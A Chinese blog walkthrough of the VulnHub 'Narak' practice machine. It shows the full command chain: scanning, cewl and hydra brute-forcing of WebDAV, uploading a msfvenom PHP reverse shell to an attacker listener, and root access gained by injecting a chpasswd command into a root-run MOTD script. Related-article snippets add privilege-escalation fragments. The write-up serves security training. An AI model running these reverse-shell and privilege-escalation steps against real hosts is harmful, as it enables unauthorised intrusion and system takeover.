【vulnhub】narak

已于 2022-07-06 13:14:09 修改
阅读量818 收藏 5
点赞数 4
分类专栏: vulnhub 文章标签: vulnhub
于 2022-06-29 19:09:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55675216/article/details/125526337
版权
本文详细记录了一次渗透测试的过程,从使用ARP扫描和Nmap进行主机发现,到利用WebDAV、 nikto、CEWL、Hydra等工具获取敏感信息和爆破登录,再到利用MSF反弹shell和提权技巧,包括WebDAV上传payload、MOTD提权。最终成功获取目标系统的两个flag。
摘要由CSDN通过智能技术生成

📒博客主页:开心星人的博客主页
🔥系列专栏:vulnhub
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年6月29日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

靶机知识点
1、webdav(重点)
2、nikto发现敏感信息
3、cwel爬取字典
4、hydra爆破
5、ssh服务
6、msf反弹shell
7、motd提权

主机发现
arp-scan -l
在这里插入图片描述
192.168.0.104 是靶机ip,因为VMware Inc

端口扫描
nmap -p- -sV 192.168.0.104
在这里插入图片描述

ssh服务和http服务

访问一下80端口
在这里插入图片描述
是个图片展示
在这里插入图片描述
翻到最后,Do Not Click
点一下
在这里插入图片描述
看这个url
在这里插入图片描述
到了这个目录遍历页面,不知道会不会有PUT文件上传之类的漏洞

dirb http://192.168.0.104
常规扫目录
在这里插入图片描述
在这里插入图片描述
没有权限

访问webdav
在这里插入图片描述
需要账号密码。
webdav是基于http1.1的一种通信协议,类似于ftp的一种协议,可以上传下载文件。

继续看别的吧

nikto -host 192.168.0.104 -port 80
收集一下信息
在这里插入图片描述
这一步其实没啥意义,但有时候可能会有用

cwel爬取网页的账号密码
cewl http://192.168.0.104/ -w dict.txt
在这里插入图片描述

hydra爆破
hydra -L dict.txt -P dict.txt 192.168.0.104 http-get /webdav
在这里插入图片描述
登录一下
在这里插入图片描述
还是用命令行来登录吧

cadaver http://192.168.0.104/webdav
在这里插入图片描述

webdav是基于http1.1的一种通信协议,类似于ftp的一种协议,可以上传下载文件。
再看一眼这个,所以可以传shell了
在这里插入图片描述
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.103 lport=7777 -o shell.php
生成一个反弹shell的payload
在这里插入图片描述
可能需要去掉这个注释符,我去掉了
保存为了shell0.php

webdav上传shell
put shell0.php
在这里插入图片描述

msf开启监听

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.88.132
set lport 7777
run

浏览器访问一下我们上传的shell

在这里插入图片描述
msf这边拿到了shell
在这里插入图片描述
想用python弹一个交互式的shell,发现没有python,就这了
python3 -c 'import pty; pty.spawn("/bin/bash")'
要用python3
可以了

suid提权
查找具有suid权限的二进制文件
find / -user root -type f -perm -ug=x,o=w -exec ls -al {} \; 2>/dev/null
在这里插入图片描述
一个奇怪的hell.sh
直接看
在这里插入图片描述
brainfuck解码
得到chitragupt

在这里插入图片描述
用刚刚得到的密码,登录其他用户看看
先su看一下,不行在ssh

在这里插入图片描述

cd ~ 一定要去家目录看
在这里插入图片描述

拿到了第一个flag,第二个flag肯定是提权

不知道咋弄,看wp
motd提权
还是那个suid一部分可能
在这里插入图片描述
有一个00-header文件
在这里插入图片描述
motd(message of the day),每日提示,功能就是当我们登录时,来执行motd文件,达到提示目的。这里我们其他人也有修改权限,而且属主是root,可以用来提权。

当我们通过ssh登录成功的时候,这些sh脚本会以root权限运行输出那些欢迎信息和日期等等,并且我们当前这个用户对这些文件可读可写,那么提权思路就有了,我们可以通过在这些sh脚本中写入一个修改root用户密码的命令,这样当我们通过ssh用户登录到inferno这个账号上的时候,我们这些motd的sh脚本就会被以root用户的权限执行,这时候我们写入的修改root用户密码的命令也会被执行,之后我们只需要切换到root用户即可完成提权.

echo "echo 'root:inferno'|sudo chpasswd" >> /etc/update-motd.d/00-header

我们要用ssh登录inferno
ssh -p 22 inferno@192.168.0.104
输入密码chitragupt

su root
输入密码为inferno
登录成功

flag就在/root下

开心星人
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
hackthebox-traceback(lua提权/ssh密钥覆盖/motd提权
冬萍子癸水
01-06 570
1、扫描 masscan全局快速扫,nmap再具体扫,不过么,就22 80 俩端口,太常规,没啥新花样。22想到可能有ssh登录,80进web信息搜集。 C:\root> masscan -p1-65535,U:1-65535 10.10.10.181 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-01-06 05:10:33 GMT -- forced options: -sS -Pn -n
VulnHub narak
weixin_45682839的博客
10-21 1166
涉及知识包括:主机存活探测、端口服务探测、WEB信息搜集、WEB爆破专用字典生成、暴力破解、webdav PUT上传、linux本地提权、Brainfuck加解密、motd文件注入提权等。
谈谈linux中那些非常规提权及其应用场景
阿道夫的博客
03-07 527
*提权原理:**本质上还是linux环境变量提权的那个原理,我之所以把这个提权案例拿过来,是因为我认为发现和分析用户自定义文件的这个过程及其思想是有价值的。环境变量提权的原理我之前写过一篇文章,感兴趣的师傅可以去看看,链接如下:https://www.freebuf.com/articles/system/320593.html通过常规的信息搜集,我发现内核提权和常规的sudo等提权手段都不可行,但是在使用以下命令的时候,发现了listinfo。
MOTD注入提权
qq_41567985的博客
11-09 120
那么现在我们知道了,当我们通过ssh登录成功的时候,这些sh脚本会以root权限运行输出那些欢迎信息和日期等等,并且我们当前这个用户对这些文件可读可写,那么提权思路就有了,我们可以通过在这些sh脚本中写入一个修改root用户密码的命令,这样当我们通过ssh用户登录到inferno这个账号上的时候,我们这些motd的sh脚本就会被以root用户的权限执行,这时候我们写入的修改root用户密码的命令也会被执行,之后我们只需要切换到root用户即可完成提权,思路有了下面开始操作。
narak靶机总结
weixin_51692662的博客
11-06 668
webdav、narak靶机、motd提权
红队打靶:Narak打靶思路详解(vulnhub
Bossfrank的博客
09-02 1082
本文是vulnhub靶机Narak的详细打靶过程,涉及到的知识点包括tftp协议的使用、dav工具的使用、brainfuck语句和motd脚本提权等。知识点很密,需要实操打靶才会有深刻理解。。
靶机练习 narak ,个人学习心得
09-08
靶机练习 NARAK,个人学习心得 靶机练习 靶机练习是渗透测试的重要组成部分,它可以帮助我们检测系统中的安全漏洞和脆弱性。在这个练习中,我们使用的靶机是 NARAK,并且通过渗透测试来获取 Flag。 探测靶机 IP ...
Google搜索引擎算法的秘密
05-18
在IT行业中,搜索引擎优化(SEO)是至关重要的领域,尤其是对于Google搜索引擎,它的算法秘密一直是业界探讨的焦点。Google作为全球最广泛使用的搜索引擎,其强大的搜索能力得益于不断更新和优化的算法。...
Goruntu-Isleme
02-21
Bu komşuların sınıfları sayısının toplamı alınarak, en sık görülen sınıf o noktanın sınıflandırması olarak seçilir. **Jupyter Notebook Kullanımı** Jupyter Notebook, bilimsel ...
提权 命令 win的
11-18
提权命令可以 改成bat 格式 直接运行
各种提权、渗透经验技巧总结大全(下)
netsec_steven的博客
01-23 2765
liunx 相关提权渗透技巧总结,一、ldap 渗透技巧: 1.cat /etc/nsswitch 看看密码登录策略我们可以看到使用了file ldap模式 2.less /etc/ldap.conf base ou=People,dc=unix-center,dc=net 找到ou,dc,dc设置 3.查找管理员信息 匿名方式 ldapsearch -x
Linux***与提权:技巧总结篇
weixin_34391445的博客
11-04 154
Linux 系统下的一些常见路径:/etc/passwd /etc/shadow /etc/fstab /etc/host.conf /etc/motd /etc/ld.so.conf /var/www/htdocs/index.php /var/www/conf/httpd.conf /var/www/htdocs/index...
VulnHub靶场HA: NARAK练习 - 修改00-header文件进行提权
qq_43232893的博客
10-15 623
VulnHub靶场HA: NARAK练习简介开始 简介 攻击机ip:192.168.255.139 靶机ip: 192.168.255.142 靶机下载地址: 开始 使用nmap找到靶机地址并扫描端口 找到靶机ip,使用nmap -sV -Pn -p- -v 192.168.255.142进行端口扫描 发现开启了个80跟22端口,访问一下80端口: 什么都没有,再看看有没有敏感目录 发现了一个401登录界面 利用cewl生成字典 cewl 192.168.255.142 -w 1.txt 再使
靶机渗透测试(HA: NARAK
@小张小张的博客
10-24 2886
靶机渗透测试(HA: NARAK): Vulnhub靶机 HA: NARAK 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(Easy–Intermediate) 目标:Boot to Root .Your target is gain the Root access 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令: netdiscover -i eth0 -r 192.168.10.0
智能车竞赛的技术罗盘:导航技术可行性分析
08-25
智能车竞赛是一种结合了机械工程、电子工程、计算机科学和人工智能的综合性技术竞赛。参赛者通常需要设计和制造一个能够自主导航的小型车辆,使其能够在特定的环境或赛道上行驶,并完成一定的任务。以下是智能车竞赛的一些关键要素: 1. **车辆设计**:参赛队伍需要设计一个小型车辆,这可能包括车辆的机械结构、车轮、悬挂系统等。 2. **传感器集成**:智能车需要集成多种传感器,如摄像头、激光雷达(LIDAR)、超声波传感器、红外传感器等,用于环境感知。 3. **控制系统**:车辆的控制系统负责处理传感器数据,并根据算法做出决策,控制车辆的行驶方向和速度。 4. **导航算法**:参赛队伍需要开发导航算法,使车辆能够识别赛道、避开障碍物、遵循路径等。 5. **通信系统**:在某些竞赛中,车辆可能需要与外部系统通信,如接收实时数据或指令。 6. **电源管理**:智能车需要有效的电源管理系统,以确保在竞赛过程中的能源供应。 7. **编程与软件开发**:软件开发是智能车竞赛的核心部分,包括编写控制算法、数据处理程序和用户界面。 8. **团队合作**:智能车竞赛通常需要跨学科的团队合作,团队成员
ssm337基于SSM框架的高校试题管理系统+vue.zip
08-25
采用Java技术和MYSQL数据库设计开发。在系统的整个开发过程中,首先对系统进行了需求分析,设计出系统的主要功能模块,包括学生功能模块、教师功能模块以及管理员功能模块三大部分,其次对网站进行总体规划和详细设计,最后对基于SSM框架的高校试题管理系统进行了系统测试,包括测试概述,测试内容等,并对测试结果进行了分析和总结,进而得出系统的不足及需要改进的地方,为以后的系统维护和扩展提供了方便。 本系统布局合理、色彩搭配和谐、框架结构设计清晰,具有操作简单,界面清晰,管理方便,功能完善等优势,有很高的使用价值。
ant-design-4.12.0.zip
08-25
ant-design,一套企业级 UI 设计语言和 React 组件库 提炼自企业级中后台产品的交互语言和视觉风格 开箱即用的高质量 React 组件
基于java档案管理系统源码 档案管理系统代码(高分毕设项目源码)
08-25
1. 档案管理系统代码说明:经导师指导并认可通过的98分毕设项目代码。 2.适用对象:本代码学习资料适用于计算机、电子信息工程、数学等专业正在做毕设的学生,需要项目实战练习的学习者,也适用于课程设计、期末大作业。 3.技术栈:java,项目代码都经过严格调试,代码没有任何bug! 4. 作者介绍:大厂码农,java领域创作者,阿里云开发社区乘风者计划专家博主,专注于大学生项目实战开发,文章底部有博主联系方式,更多优质系统、项目定制请私信。 5. 最新计算机软件毕业设计选题大全: https://blog.csdn.net/weixin_45630258/article/details/135901374
MIMO信号检测(含MRC,ZF,ZF-SIC,MMSE,MMSE-SIC对比 误码率 QPSK)7352期】.mp4
08-25
Matlab研究室上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
缺陷检测 智能识别 深度学习 快速定位识别 智能分类 ViDi蓝色 - 特征检测 使用ViDi蓝色在您的图像中执行 功能检测和
最新发布
08-25
缺陷检测 智能识别 深度学习 快速定位识别 智能分类 ViDi蓝色 - 特征检测 使用ViDi蓝色在您的图像中执行 功能检测和 本地化。它会自动找到所有寻找的零件。 ViDi红 - 异常检测
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

开心星人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值